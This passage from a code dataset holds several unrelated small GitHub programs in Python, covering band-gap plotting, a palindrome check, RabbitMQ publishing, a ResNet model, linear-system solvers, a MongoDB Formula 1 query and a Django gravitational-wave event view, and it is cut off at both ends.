x_int_up_a)\n x_int_up = 0.5 * (x_int_up_t + x_int_lo_a)\n\n # plotting interpolation and horizontals\n fig1, ax1 = plt.subplots(1, 1)\n if not save_fig:\n fig1.suptitle(\"Band Gap Normalized, Sample: \" + sample_name + \", \" + side[j])\n # plotting the linear fit, including shading of errors\n ax1.plot(x_grid, t_real, '.', c=plot_t.get_color(), alpha=0.8, \\\n label=(r'$T_\\mathrm{' + sample_name + r', normalized}$'))\n ax1.plot(x_grid, t_func(x_grid, *t_c), '-', c=plot_t.get_color(), alpha=0.8)\n # label=(r'$T_\\mathrm{' + sample_name + r', interpolation}$'))\n ax1.plot(x_borders_t, t_borders, 'o', c=plot_t.get_color(), alpha=0.8)\n # label=(r'lower and upper minimum for interpol.'))\n ax1.plot(x_hori, x_hori*0 + 1, '--', c=plot_t.get_color(), alpha=0.8)\n # label=(r'Horizontal at $\\max(T)$'))\n textstr = \"intersects: \\n \\\n \\\\begin{eqnarray*} \\\n \\\\alpha_1 &=& %.1f^\\circ \\\\\\\\ \\\n \\\\alpha_2 &=& %.1f^\\circ \\\n \\end{eqnarray*}\"%(x_int_up_t, x_int_lo_t)\n ax1.plot(x_int_t, t_func(x_int_t, *t_c), 's', c=plot_t.get_color(), alpha=0.8) #, label=(textstr))\n ax1.plot(x_grid, a_real, '.', c=plot_a.get_color(), alpha=0.8, \\\n label=(r'$A_\\mathrm{' + sample_name + r', normalized}$'))\n ax1.plot(x_grid, a_func(x_grid, *a_c), '-', c=plot_a.get_color(), alpha=0.8)\n # label=(r'$A_\\mathrm{' + sample_name + r', interpolation}$'))\n ax1.plot(x_borders_a, a_borders, 'o', c=plot_a.get_color(), alpha=0.8)\n # label=(r'lower and upper minimum for interpol.'))\n ax1.plot(x_hori, x_hori*0 + min_a, '--', c=plot_a.get_color(), alpha=0.8)\n # label=(r'Horizontal at $\\min(A)$'))\n textstr = \"intersects: \\n \\\n \\\\begin{eqnarray*} \\\n \\\\alpha_1 &=& %.1f^\\circ \\\\\\\\ \\\n \\\\alpha_2 &=& %.1f^\\circ \\\n \\end{eqnarray*}\"%(x_int_up_t, x_int_lo_t)\n ax1.plot(x_int_a, a_func(x_int_a, *a_c), 's', c=plot_a.get_color(), alpha=0.8) #, label=(textstr))\n ax1.set_xlim(xlims[j])\n ax1.set_ylim(-0.1, 1.1)\n ax1.set_xlabel(\"angle / degrees\")\n ax1.set_ylabel(\"$U$ / V\")\n ax1.legend(loc=legend_loc[j])\n if show_fig:\n fig1.show()\n if save_fig:\n file_name = \"band_gap_result_\" + sample_name + \"_\" + side[j]\n fig1.savefig(fig_dir + file_name + \".pdf\")\n fig1.savefig(fig_dir + file_name + \".png\")\n\n\n E = ang_to_E(x_int, sample_name)\n E_lo = ang_to_E(x_int_lo, sample_name)\n E_up = ang_to_E(x_int_up, sample_name)\n dE = max(abs(E - E_lo), abs(E - E_up))\n Es[j] = uc.ufloat(E, dE)\n dEs[j] = dE\n\n f.write(\"\\t\\t%s & %.2f & %.2f & %.2f & %.2f & %.2f & $(%.2f \\pm %.2f)$\\\\\\\\ \\n\" \\\n %(sample_name, x_int, x_int_lo, x_int_up, E_lo, E_up, E, dE))\nf.write(\"\\t\\t\\hline\\n\")\nf.write(\"\\t\\end{tabular}\\n\")\nf.close()\n\ni = 0\nE_Ge = (Es[i] / dEs[i]**2 + Es[i+1] / dEs[i+1]**2) / np.sum((1 / dEs[i:i+2])**2)\ni = 2\nE_Si = (Es[i] / dEs[i]**2 + Es[i+1] / dEs[i+1]**2) / np.sum((1 / dEs[i:i+2])**2)\n","repo_name":"Bondzio/fp","sub_path":"semiconductor/analysis/band_gap.py","file_name":"band_gap.py","file_ext":"py","file_size_in_byte":12846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5340581906","text":"# Codigo que determine si una cadena de texto es un palindromo o no\n\n# Entrada\ncadena = input(\"Please type your phrase:\")\n\n# Proceso\ncadena = cadena.lower().replace(\" \", \"\")\nreversa = cadena[::-1]\nif cadena == reversa:\n resultado = \"La cadena es un palindromo\"\nelse:\n resultado = \"La cadena no es un palindromo\"\n\n# Salida\nprint(resultado)","repo_name":"CristianMiron0/EjerciciosConPython","sub_path":"ExAlgoritmo9.py","file_name":"ExAlgoritmo9.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70947205587","text":"from datetime import datetime\nimport json\nimport logging\nimport random\nimport sys\nimport time\n\nimport pika\n\n\nlogging.basicConfig(level=logging.INFO)\n\nDATA_PATH = './data/data.json'\nRABBITMQ_HOST = 'metr-device-rabbitmq'\nQUEUE_NAME = 'measurements'\n\n\ndef nap() -> None:\n \"\"\"\n Sleep for a random amount of time between 1 and 5 seconds.\n \"\"\"\n a_time = random.randint(1, 5)\n logging.info(f'Sleeping for {a_time} seconds...')\n time.sleep(a_time)\n\n\ndef setup_rabbitmq() -> pika.BlockingConnection:\n \"\"\"\n Create a connection and channel to RabbitMQ.\n \"\"\"\n connection_params = pika.ConnectionParameters(host=RABBITMQ_HOST)\n connection = pika.BlockingConnection(connection_params)\n channel = connection.channel()\n channel.queue_declare(queue=QUEUE_NAME, durable=True)\n return connection, channel\n\n\ndef publish_message(channel, message_data):\n \"\"\"\n Publish a message to the RabbitMQ queue.\n \"\"\"\n channel.basic_publish(\n exchange='',\n routing_key=QUEUE_NAME,\n body=json.dumps(message_data),\n properties=pika.BasicProperties(delivery_mode=2),\n )\n\n\ndef main() -> None:\n with open(DATA_PATH) as f:\n data = json.load(f)\n\n connection, channel = setup_rabbitmq()\n\n try:\n while True:\n for i, measurement_data in enumerate(data):\n nap()\n publish_message(channel, measurement_data)\n logging.info(\n f'Sent measurement #{i+1} at {datetime.now().strftime(\"%H:%M:%S\")}'\n )\n\n except KeyboardInterrupt:\n logging.info('Exiting...')\n sys.exit(0)\n\n finally:\n connection.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CavalcanteLucas/metr","sub_path":"device/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32991882701","text":"import sys\r\ninput = sys.stdin.readline\r\ndef main():\r\n r = []\r\n answer = []\r\n N,M = map(int,input().split())\r\n for _ in range(N):\r\n s = input().strip()\r\n r.append(s)\r\n \r\n for i in range(N-7):\r\n for j in range(M-7):\r\n start_b = 0\r\n start_w = 0\r\n for k in range(i,i+8):\r\n for l in range(j,j+8):\r\n if (k+l)%2 == 0:\r\n if r[k][l] != \"B\":\r\n start_b +=1\r\n else:\r\n start_w +=1\r\n else:\r\n if r[k][l] != \"W\":\r\n start_b +=1\r\n else:\r\n start_w +=1\r\n answer.append(start_b)\r\n answer.append(start_w)\r\n print(min(answer))\r\n \r\nmain()","repo_name":"kimdahee7/CodingTest_Python","sub_path":"백준/Silver/1018. 체스판 다시 칠하���/체스판 다시 칠하기.py","file_name":"체스판 다시 칠하기.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1049692894","text":"from qgis.utils import iface\nfrom qgis.core import *\n\nlayer = iface.activeLayer()\nlayer.startEditing()\nfeatures = layer.getFeatures()\n\nfor feature in features:\n # изменение атрибутов\n geom = feature.geometry()\n x = geom.asPoint().x()\n y = geom.asPoint().y()\n \n feature.setAttribute('x', x)\n feature.setAttribute('y', y)\n \n layer.updateFeature(feature)\n \n # перемещениие согласно атрибутам\n new_geom = QgsGeometry.fromPointXY(QgsPointXY(x,y))\n layer.dataProvider().changeGeometryValues({ feature.id() : new_geom })\n\nlayer.commitChanges()\n","repo_name":"vladweat/qgis","sub_path":"script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21930971297","text":"import os\nimport paddle\n\nfrom paddle.vision.models.resnet import ResNet as PDResNet\nfrom paddle.vision.models.resnet import BottleneckBlock, BasicBlock\n\nfrom passl.models.base_model import Model\nfrom passl.nn import init\n\n__all__ = [\n \"ResNet\",\n \"resnet18\",\n \"resnet34\",\n \"resnet50\",\n \"resnet101\",\n \"resnet152\",\n \"resnext50_32x4d\",\n \"resnext50_64x4d\",\n \"resnext101_32x4d\",\n \"resnext101_64x4d\",\n \"resnext152_32x4d\",\n \"resnext152_64x4d\",\n \"wide_resnet50_2\",\n \"wide_resnet101_2\",\n]\n\nclass ResNet(PDResNet, Model):\n def __init__(\n self,\n block,\n depth=50,\n width=64,\n class_num=1000,\n with_pool=True,\n groups=1,\n zero_init_residual=True,\n ):\n super().__init__(block, depth=depth, width=width, num_classes=class_num, with_pool=with_pool, groups=groups)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.sublayers():\n if isinstance(m, BottleneckBlock):\n init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n init.constant_(m.bn2.weight, 0)\n\n def load_pretrained(self, path, rank=0, finetune=False):\n if not os.path.exists(path + '.pdparams'):\n raise ValueError(\"Model pretrain path {} does not \"\n \"exists.\".format(path))\n\n state_dict = self.state_dict()\n param_state_dict = paddle.load(path + \".pdparams\")\n\n # for FP16 saving pretrained weight\n for key, value in param_state_dict.items():\n if key in param_state_dict and key in state_dict and param_state_dict[\n key].dtype != state_dict[key].dtype:\n param_state_dict[key] = param_state_dict[key].astype(\n state_dict[key].dtype)\n\n self.set_dict(param_state_dict)\n\n def save(self, path, local_rank=0, rank=0):\n paddle.save(self.state_dict(), path + \".pdparams\")\n\ndef resnet18(**kwargs):\n \"\"\"ResNet 18-layer model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n \"\"\"\n\n model = ResNet(BasicBlock, 18, **kwargs)\n return model\n\ndef resnet34(**kwargs):\n \"\"\"ResNet 34-layer model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n \"\"\"\n\n model = ResNet(BasicBlock, 34, **kwargs)\n return model\n\ndef resnet50(**kwargs):\n \"\"\"ResNet 50-layer model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n \"\"\"\n\n model = ResNet(BottleneckBlock, 50, **kwargs)\n return model\n\n\ndef resnet101(**kwargs):\n \"\"\"ResNet 101-layer model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n \"\"\"\n\n model = ResNet(BottleneckBlock, 101, **kwargs)\n return model\n\ndef resnet152(**kwargs):\n \"\"\"ResNet 152-layer model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n \"\"\"\n\n model = ResNet(BottleneckBlock, 152, **kwargs)\n return model\n\n\ndef resnext50_32x4d(**kwargs):\n \"\"\"ResNeXt-50 32x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 32\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 50, **kwargs)\n return model\n\ndef resnext50_64x4d(**kwargs):\n \"\"\"ResNeXt-50 64x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 64\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 50, **kwargs)\n return model\n\ndef resnext101_32x4d(**kwargs):\n \"\"\"ResNeXt-101 32x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 32\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 101, **kwargs)\n return model\n\ndef resnext101_64x4d(**kwargs):\n \"\"\"ResNeXt-101 64x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 64\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 101, **kwargs)\n return model\n\n\ndef resnext152_32x4d(**kwargs):\n \"\"\"ResNeXt-152 32x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 32\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 152, **kwargs)\n return model\n\ndef resnext152_64x4d(**kwargs):\n \"\"\"ResNeXt-152 64x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 64\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 152, **kwargs)\n return model\n\ndef wide_resnet50_2(**kwargs):\n \"\"\"Wide ResNet-50-2 model from\n `\"Wide Residual Networks\" <https://arxiv.org/pdf/1605.07146.pdf>`_.\n \"\"\"\n\n kwargs['width'] = 64 * 2\n model = ResNet(BottleneckBlock, 50, **kwargs)\n return model\n\ndef wide_resnet101_2(**kwargs):\n \"\"\"Wide ResNet-101-2 model from\n `\"Wide Residual Networks\" <https://arxiv.org/pdf/1605.07146.pdf>`_.\n \"\"\"\n\n kwargs['width'] = 64 * 2\n model = ResNet(BottleneckBlock, 101, **kwargs)\n return model\n","repo_name":"PaddlePaddle/PASSL","sub_path":"passl/models/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"48"} +{"seq_id":"17766735558","text":"import http.server\nimport socketserver\n\nPORT = 8000\n\nclass MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/a':\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n message = \"a\"\n self.wfile.write(bytes(message, \"utf8\"))\n return\n elif self.path == '/b':\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n message = \"b\"\n self.wfile.write(bytes(message, \"utf8\"))\n return\n else:\n http.server.SimpleHTTPRequestHandler.do_GET(self)\n\nHandler = MyHttpRequestHandler\n\nwith socketserver.TCPServer((\"\", PORT), Handler) as httpd:\n print(\"serving at port\", PORT)\n httpd.serve_forever()","repo_name":"Unparalleled-Calvin/kross","sub_path":"example/simple-server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33334774454","text":"#!/usr/bin/env python\n\nimport scrollphat as sp\nimport math\nimport time\nimport sys\nfrom random import randint\n\nsp.set_rotate(False)\n\nclear = randint(0,10)\nif clear > 5:\n for w in range(0,randint(5,20)):\n for x in range(0,11):\n for y in range(0,5):\n sp.set_pixel(x,y,randint(0,1))\n sp.set_brightness(128)\n sp.update()\n time.sleep(0.01)\n sp.clear()\nelse:\n for w in range(0,randint(5,20)):\n for x in range(0,11):\n for y in range(0,randint(1,5)):\n sp.set_pixel(x,y,1)\n sp.set_brightness(128)\n sp.update()\n time.sleep(0.01)\n sp.clear()\n \n","repo_name":"alleetanner/pimoroni_pHAT_python_scripts","sub_path":"my_scrolls/crash.py","file_name":"crash.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32365981635","text":"# importing cv2\nimport cv2\n\n# path\nimport numpy\n\npath = '.\\imgs\\circuloverde.png'\n\n# Using cv2.imread() method\nimg = cv2.imread(path)\n\n# Displaying the image\ncv2.imshow('image', img)\ncv2.waitKey(0)\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\nprint(hsv)\nlower_range = numpy.array([36, 0, 0])\nupper_range = numpy.array([86, 255, 255])\nmask = cv2.inRange(hsv, lower_range, upper_range)\ncv2.imshow(\"image\", mask)\ncv2.waitKey(0)","repo_name":"marcelopd20/PythonStudies","sub_path":"OpenCV/DesafioCorEForma/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12633344002","text":"# EP2 - Calculo numerico\n#\n# =============================================================================\n# vamos resolver o seguinte sistema linear\n# |0 5 -1||I1| |5 |\n# |11 0 1||I2| = |14|\n# |1 -1 -1||I3| |0 |\n# =============================================================================\n\nimport numpy as np\n\n# b) metodo de Eliminacao de Gauss\n\nA = [[0, 5,-1],\n [11,0, 1],\n [1,-1,-1]]\n\nb = [5,14,0]\n\n\n# O metodo\ndef Gauss(A, b):\n n = len(A)\n \n # fazendo uma matriz mais facil de resolver\n for i in range (len(A)):\n A[i].append(b[i])\n #print(A)\n for i in range (n):\n \n # procurando o maior elemento da coluna\n maiEl = abs(A[i][i])\n maiLin = i\n for k in range (i+1, n):\n if abs(A[k][i]) > maiEl:\n maiEl = abs (A[k][i])\n maiLin = k\n\n # substituindo a atniga pela agora, maior linha\n for k in range (i, n+1):\n tmp = A[maiLin][k]\n A[maiLin][k] = A[i][k] \n A[i][k] = tmp\n \n # zerando as demais linhas\n for k in range (i+1, n):\n c = - float(A[k][i])/float(A[i][i])\n for j in range (i, n+1):\n A[k][j] += c * float(A[i][j]) \n print('i =',i,A)\n \n # achando as solucoes\n X = []\n for i in range (n):\n X.append(0)\n for i in range(n-1, -1, -1):\n X[i] = A[i][n]/A[i][i]\n for k in range(n-1, -1, -1):\n A[k][n] -= A[k][i] * X[i]\n return (X)\n\n#==============================================================================\n\n# c) Resolvendo pelo metodo de Jacobi\n\n# criterio de parada\nerro = 0.001\n\n# funcao main \ndef Jacobi(A, b):\n n = len(A)\n \n # permutando as duas primeiras linhas\n A[0], A[1] = A[1], A[0]\n b[0], b[1] = b[1], b[0]\n\n def erro(A, B):\n C = np.absolute(np.subtract(A , B))\n return (np.amax(C))\n \n \n # criando as matrizes do metodo \n X = np.zeros(n)\n novo_X = np.zeros(n)\n D = np.diag(A)\n J = A - np.diagflat(D)\n \n # variaveis do laco\n k = 0\n e = 10\n eps = 0.001\n while eps < e:\n X = novo_X\n novo_X = (b - np.dot(J,X))/D\n e = erro(X, novo_X)\n k += 1\n print('k= ', k , 'erro = ', e ,'\\n', 'I1= ' , novo_X[0],'\\n', 'I2= ' ,\n novo_X[1],'\\n', 'I3= ' , novo_X[2])\n return (X)\n \n#==============================================================================\n\n# d) Metodo de Gaus-Seidel\n\n# criterio de parada\nerro = 0.001\n\n# funcao main \ndef Seidel(A, b):\n n = len(A)\n \n # permutando as duas primeiras linhas\n A[0], A[1] = A[1], A[0]\n b[0], b[1] = b[1], b[0]\n\n # Variaveris necessarias\n X_teste = [0 for i in range(n)]\n X = [0 for i in range(n)]\n e = 10\n erro = 0.001\n k = 0\n \n # O metodo\n while erro < e:\n for i in range (n):\n X_teste[i] = X[i]\n X[i] = b[i]/A[i][i]\n for j in range(0,i):\n if j != i:\n X[i] -= A[i][j]*X[j]/A[i][i]\n e = abs(X_teste[i]-X[i])\n k += 1\n print('k= ', k , 'erro = ', e ,'\\n', 'I1= ' , X_teste[0],'\\n', 'I2= ' ,\n X_teste[1],'\\n', 'I3= ' , X_teste[2])\n return (X)","repo_name":"gabiul/EP_numerico","sub_path":"EP2.py","file_name":"EP2.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15655343945","text":"import pygame\n\nclass Score:\n def __init__(self, win, setting):\n self.setting = setting\n self.win = win\n self.color = (60, 60, 60)\n self.size = 20\n self.pen = pygame.font.SysFont(\"comicsans\", self.size)\n self.pre_score()\n \n def pre_score(self):\n \n \n self.text = self.pen.render(f\"SCORE : {self.setting.init_score}\", 1, self.color)\n self.rect = self.text.get_rect()\n self.rect.x = self.setting.WIDTH - self.size * 8\n self.rect.y = self.size \n \n \n def write(self):\n self.win.blit(self.text, (self.rect))\n \n ","repo_name":"billwangust/my_pygame_spaceInvader","sub_path":"game_stats.py","file_name":"game_stats.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10877718185","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n\"\"\"\n@description: check bank account\n@file_name: check_bank_account.py\n@project: my_love\n@version: 1.0\n@date: 2021/01/11 15:22\n@author: Air\n\"\"\"\n\n__author__ = 'Air'\n\nimport pandas as pd\n\n\ndef check(input_file: str, check_file: str) -> None:\n df1 = pd.read_excel(input_file)\n df2 = pd.read_excel(check_file)\n number_set = set()\n for i in range(df2.shape[0]):\n if not pd.isna(df2.iloc[i, 1]):\n number_set.add(str(df2.iloc[i, 2])[-5:])\n df = pd.DataFrame(columns=['出纳提交时间', '交易时间', '凭证日期', '凭证编号', '借方发生额(支取)',\n '贷方发生额(收入)', '对方户名', '对方账号', '对方开户机构', '记账日期', '摘要', '备注'])\n for i in range(df1.shape[0]):\n number = str(df1.iloc[i, 3])[-5:]\n if number not in number_set:\n df = df.append(df1.iloc[i])\n df.to_excel('out.xls', index=False, encoding='utf-8')\n df1 = df1.drop(df.index)\n df1.to_excel('in.xls', index=False, encoding='utf-8')\n","repo_name":"airmelt/my_love","sub_path":"check_bank_account.py","file_name":"check_bank_account.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24836381111","text":"import re\nfrom this import d\nfrom xmlrpc.client import TRANSPORT_ERROR\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom rest_framework.parsers import JSONParser\n\n\nfrom django.conf import settings\n\n# Create your views here.\nimport pymongo\nimport matplotlib.pyplot as plt\nimport matplotlib as pl\nimport numpy as np\nimport pandas as pd\nimport urllib , base64\nimport io\nfrom matplotlib import style\n\n# Create your views here.\n\n@csrf_exempt\n@api_view(['GET', 'POST', 'DELETE'])\n\ndef carreras(request,year,race,driverId):\n #pasar a int el valor year\n year = int(year)\n client= pymongo.MongoClient(settings.MONGO_URI)\n db = client.get_database('proyecto')\n collection = db.get_collection('races')\n pipeline = [{\"$match\":{\n \"year\": year\n }\n},\n{\n \"$lookup\":{\n \"localField\":\"circuitId\",\n \"from\":\"circuits\",\n \"foreignField\":\"circuitId\",\n \"as\":\"circuitDetail\"\n\n }\n},\n{\"$unwind\":\"$circuitDetail\"},\n{\n \"$project\":{\n \"raceId\":1,\n \"name\":1,\n \"date\":1,\n \"circuitId\":\"$circuitDetail.circuitId\",\n \"circuitName\":\"$circuitDetail.name\",\n }\n},\n{\n \"$match\":{\"circuitName\": race}\n},\n{\n \"$lookup\":{\n \"localField\":\"raceId\",\n \"from\":\"results\",\n \"foreignField\":\"raceId\",\n \"as\":\"circuitResult\"\n\n }\n},\n{\"$unwind\":\"$circuitResult\"},\n{\n \"$project\":{\n \"raceId\":1,\n \"name\":1,\n \"date\":1,\n \"circuitId\":1,\n \"circuitName\":1,\n \"driverId\":\"$circuitResult.driverId\",\n \"constructorId\":\"$circuitResult.constructorId\",\n \"number\":\"$circuitResult.number\",\n \"positionOrder\":\"$circuitResult.position\",\n \"points\":\"$circuitResult.points\",\n \"laps\":\"$circuitResult.laps\",\n \"time\":\"$circuitResult.time\",\n \"grid\":\"$circuitResult.grid\",\n \"fastestLap\":\"$circuitResult.fastestLap\",\n \"statusId\":\"$circuitResult.statusId\"}\n},\n{\n \"$lookup\":{\n \"localField\":\"constructorId\",\n \"from\":\"constructors\",\n \"foreignField\":\"constructorId\",\n \"as\":\"constructorDetail\"\n\n }\n},\n{\"$unwind\":\"$constructorDetail\"},\n{\n \"$project\":{\n \"raceId\":1,\n \"name\":1,\n \"date\":1,\n \"circuitId\":1,\n \"circuitName\":1,\n \"driverId\":1,\n \"constructorId\":1,\n \"number\":1,\n \"positionOrder\":1,\n \"points\":1,\n \"laps\":1,\n \"time\":1,\n \"grid\":1,\n \"fastestLap\":1,\n \"statusId\":1,\n \"constructorName\":\"$constructorDetail.name\",\n \"constructorNationality\":\"$constructorDetail.nationality\"\n }\n},\n{\n \"$match\":{\"driverId\":driverId}\n},\n{\n \"$lookup\":{\n \"localField\":\"driverId\",\n \"from\":\"drivers\",\n \"foreignField\":\"driverId\",\n \"as\":\"driverDetail\"\n\n }\n},\n{\"$unwind\":\"$driverDetail\"},\n{\n \"$project\":{\n \"raceId\":1,\n \"name\":1,\n \"date\":1,\n \"circuitId\":1,\n \"circuitName\":1,\n \"driverId\":1,\n \"constructorId\":1,\n \"number\":1,\n \"positionOrder\":1,\n \"points\":1,\n \"laps\":1,\n \"time\":1,\n \"grid\":1,\n \"fastestLap\":1,\n \"statusId\":1,\n \"constructorName\":1,\n \"constructorNationality\":1,\n \"code\":\"$driverDetail.code\",\n \"surname\":\"$driverDetail.surname\",\n \"forename\":\"$driverDetail.forename\",\n \"nationality\":\"$driverDetail.nationality\"\n }\n},\n{\n \"$lookup\":{\n \"localField\":\"statusId\",\n \"from\":\"status\",\n \"foreignField\":\"statusId\",\n \"as\":\"statusDetail\"\n\n }\n},\n{\n \"$unwind\":\"$statusDetail\"\n},\n{\n \"$project\":{\n \"raceId\":1,\n \"name\":1,\n \"date\":1,\n \"circuitId\":1,\n \"circuitName\":1,\n \"driverId\":1,\n \"constructorId\":1,\n \"number\":1,\n \"positionOrder\":1,\n \"points\":1,\n \"laps\":1,\n \"time\":1,\n \"grid\":1,\n \"fastestLap\":1,\n \"statusId\":1,\n \"constructorName\":1,\n \"constructorNationality\":1,\n \"code\":1,\n \"surname\":1,\n \"forename\":1,\n \"nationality\":1,\n \"status\":\"$statusDetail.status\"}\n},\n{\n \"$lookup\":{\n \"from\": \"lap_times\",\n \"let\":{\n \"driverId\":\"$driverId\",\n \"raceId\": \"$raceId\",\n \"laps\":\"$fastestLap\"\n },\n \"pipeline\":[\n {\n \"$match\":{\n \"$expr\":{\n \"$and\":[\n {\n \"$eq\":[\"$driverId\",\"$$driverId\"]\n },\n {\n \"$eq\":[\"$raceId\",\"$$raceId\"]\n },\n {\n \"$eq\":[\"$lap\",\"$$laps\"]\n },\n ]\n }\n }\n }\n ],\n \"as\":\"fastestLapDetail\"\n }\n},\n{\n \"$unwind\":\"$fastestLapDetail\"\n},\n{\n \"$project\":{\n \"raceId\":1,\n \"name\":1,\n \"date\":1,\n \"circuitId\":1,\n \"circuitName\":1,\n \"driverId\":1,\n \"constructorId\":1,\n \"number\":1,\n \"positionOrder\":1,\n \"points\":1,\n \"laps\":1,\n \"time\":1,\n \"grid\":1,\n \"fastestLap\":1,\n \"statusId\":1,\n \"constructorName\":1,\n \"constructorNationality\":1,\n \"code\":1,\n \"surname\":1,\n \"forename\":1,\n \"nationality\":1,\n \"status\":1,\n \"lapFast\": \"$fastestLapDetail.time\"\n }\n}\n\n]\n registros=collection.aggregate(pipeline)\n registros_df=pd.DataFrame(list(registros))\n #contatenar los campos forename y surname del dataframe registros_df\n registros_df['name']=pd.concat([registros_df['forename'],registros_df['surname']],axis=1).apply(lambda x: ' '.join(x),axis=1)\n #eliminar los campos forename y surname del dataframe registros_df\n registros_df.drop(['forename','surname'],axis=1,inplace=True)\n registros_df.drop(['raceId','_id','circuitId','constructorId','driverId'],axis=1,inplace=True)\n #generar el campo overtake para el dataframe registros_df restando grid y position\n registros_df['overtake']=registros_df['grid']-registros_df['positionOrder']\n \n #cambiar todos los valores NaN por 0\n registros_df.fillna(0,inplace=True)\n \n \n # mostrar el dataframe en el template como tabla\n #emision=registros_df.to_html(classes='table table-striped table-bordered table-hover')\n #return HttpResponse(emision)\n \n #enviar el dataframe como json\n return JsonResponse(registros_df.to_dict(orient='records'),safe=False)","repo_name":"NaranjoJimenezAndres2/Django_DEMO_proyecto","sub_path":"carreraDetalle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21102970460","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom django.conf import settings\n\n# Create your views here.\nfrom .forms import GWEventForm\nfrom .models import GWEvent\n\nfrom ligo.gracedb.rest import GraceDb\nfrom sqlalchemy.engine import create_engine\n\nimport pandas\nimport os\n\ndef index(request):\n form = GWEventForm()\n return render(request, 'gw-event-form.html', {'form': form})\n\ndef newevent(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n\n # create a form instance and populate it with data from the request:\n form = GWEventForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # This is where waveform generation code will go Chris P\n # You parse the request for as such\n superevent_id = str(form.cleaned_data['superevent_id'])\n api = str(form.cleaned_data['api'])\n client = GraceDb(api)\n sevent = client.superevent(superevent_id)\n info = sevent.json()\n gwevent, created = GWEvent.objects.get_or_create(superevent_id=superevent_id,\n preferred_event=info['preferred_event'])\n gevent = client.event(info['preferred_event'])\n \n if created:\n if info['gw_id']:\n gwevent.gw_id = info['gw_id']\n gwevent.save()\n return render(request, 'success.html', {'message' : \"This event was created\"})\n else:\n if not gwevent.posteriors_uploaded:\n filenames = client.files(gwevent.preferred_event).json()\n # find posterior samples file\n post_files = [ifile for ifile in filenames.keys() if 